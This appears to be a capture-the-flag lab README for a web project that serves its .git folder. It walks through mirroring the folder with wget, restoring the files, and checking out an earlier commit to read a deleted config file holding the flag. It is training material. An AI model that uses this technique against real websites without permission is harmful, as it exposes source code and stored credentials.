# Exposed Git Folder

Web project that have the git folder exposed.

## Setup

Requirements:
* Python3
* Run `pip install -r requirements.txt`

Running:
* Clone this repo.
* Run `run-http-server.sh`

## Capturing the flag

### Step 1: Downloading the git folder
Download the `.git` repo using wget:

```bash
wget --mirror -I .git {HOST}:{PORT}/.git/
```

This will download the git folder from remote to a .git folder locally.

### Step 2: Checkout the files
Now we will restore the files:

```bash
git checkout -- .
ls -la
```

This will show the files:

```
total 48
drwxr-xr-x 5 kali kali 4096 Apr 29 13:01 .
drwxr-xr-x 3 kali kali 4096 Apr 29 13:01 ..
-rw-r--r-- 1 kali kali  137 Apr 29 13:01 app.py
drwxr-xr-x 7 kali kali 4096 Apr 29 13:01 .git
-rw-r--r-- 1 kali kali 2035 Apr 29 13:01 .gitignore
-rw-r--r-- 1 kali kali  381 Apr 29 13:01 index.html
-rw-r--r-- 1 kali kali   67 Apr 29 13:01 README.md
-rw-r--r-- 1 kali kali   95 Apr 29 13:01 requirements.txt
-rw-r--r-- 1 kali kali   69 Apr 29 13:01 run-flask.sh
-rw-r--r-- 1 kali kali   27 Apr 29 13:01 run-http-server.sh
drwxr-xr-x 2 kali kali 4096 Apr 29 13:01 static
drwxr-xr-x 2 kali kali 4096 Apr 29 13:01 templates
```

### Step 3: Going back in time
Now we need to check if something in history can compromise data:

```
git log
```

```
commit a5442c19aa222aded2ce999b92f59807c1195abc (HEAD -> master, origin/master, origin/HEAD)
Author: Thor <thor@5minsec.com>
Date:   Thu Apr 29 13:32:07 2021 -0300

    removing config

commit 3e9f7c5f97fdf914a666aaf65a6958b4d30a5ec1
Author: Thor <thor@5minsec.com>
Date:   Thu Apr 29 13:08:59 2021 -0300

    adding base folder

commit dbd080b0f6fdc66c164cafee27009e8fe10751d0
Author: Thor <thor@5minsec.com>
Date:   Thu Apr 29 15:53:06 2021 +0000

    Initial commit
```

Realize this commit `a5442c19aa222aded2ce999b92f59807c1195abc` has a message `removing config`.

Probably the previous commit has a file with the config.

```bash
git checkout 3e9f7c5f97fdf914a666aaf65a6958b4d30a5ec1
ls -la
```
```bash
total 52
drwxr-xr-x 5 kali kali 4096 Apr 29 13:05 .
drwxr-xr-x 3 kali kali 4096 Apr 29 13:01 ..
-rw-r--r-- 1 kali kali  137 Apr 29 13:05 app.py
-rw-r--r-- 1 kali kali   33 Apr 29 13:05 config.py # HERE <---
drwxr-xr-x 7 kali kali 4096 Apr 29 13:05 .git
-rw-r--r-- 1 kali kali 2035 Apr 29 13:05 .gitignore
-rw-r--r-- 1 kali kali  381 Apr 29 13:05 index.html
-rw-r--r-- 1 kali kali   67 Apr 29 13:01 README.md
-rw-r--r-- 1 kali kali   95 Apr 29 13:05 requirements.txt
-rw-r--r-- 1 kali kali   69 Apr 29 13:05 run-flask.sh
-rw-r--r-- 1 kali kali   27 Apr 29 13:05 run-http-server.sh
drwxr-xr-x 2 kali kali 4096 Apr 29 13:05 static
drwxr-xr-x 2 kali kali 4096 Apr 29 13:05 templates
```

### Step 3: Capturing the flag
Now just cat the file:

```bash
cat config.py
```

```
flag = "CWI{.....}"
```
